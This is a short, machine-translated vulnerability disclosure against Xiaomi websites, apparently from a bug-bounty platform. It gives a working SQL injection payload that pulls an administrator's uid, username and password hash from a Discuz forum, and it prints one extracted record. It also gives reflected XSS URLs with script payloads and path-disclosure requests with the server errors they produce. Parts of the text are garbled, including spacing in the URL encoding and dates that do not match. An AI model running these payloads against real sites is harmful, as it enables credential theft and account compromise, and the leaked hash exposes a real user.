Brief description: I searched through Google and found multiple size problems.
Detailed Description: 1. Second injection to the official mi chat forum.
Http://www.discuz.net/thread-2354532-1-1.html
Patch.
2. Cross-Site Scripting
Http://mi.xiaomi.com/%E6%96%B9%E8%B6%85x%3Cscript%3Ealert%28/ss/%29%3C/script%3E/5
3. Cross-Site Scripting
Http://mi.xiaomi.com/info.php? I = 1 & u = % CB % D5 % B9 % DA % BB % AA % 27 & e = 354111841% 40qq.com % 27% 3 Cscript % 3 Ealert % 28/s/% 29; % 3C/script % 3E
4. program error brute-force path
Http://blog.xiaomi.com/wp-content/themes/xiaomi/
5. program error brute-force path
Http://hd.xiaomi.com/index.php? Action = rank & date = 2011-11-13% 27
Proof of vulnerability: 1. x', 'subobject' = (/*! Select */concat (uid, '|', password, '|', username) from pre_common_member where groupid = 1 limit 0, 1), comment ='
4275 | fd9d2eba79764c080a3c2f9d5ab7e4a7 |
2. Omitted
3. Omitted
4,
Fatal error: Call to undefined function get_header () in/data/www/blog.xiaomi.com/wwwroot/wp-content/themes/xiaomi/index.php on line 7
5,
Fatal error: Uncaught exception 'exception' with message 'datetime ::__ construct (): Failed to parse time string (2011-11-13 \ ') at position 10 (\): unexpected character 'in/data/www/tranquility Stack trace: #0/data/www/hd.xiaomi.com/action/rank.action.php (51): DateTime->__ construct ('2017-11-13 \'') #1/data/www/hd.xiaomi.com/action/rank.action.php (40): rank-> index () #2/data/www/hd.xiaomi.com/action/rank.action.php (98): rank-> init () #3/data/www/hd.xiaomi.com/web/index.php (100): require ('/data/www/hd. xi... ') #4 {main} thrown in/data/www/hd.xiaomi.com/action/rank.action.php on line 51
Solution:
You know!
Author: Jannock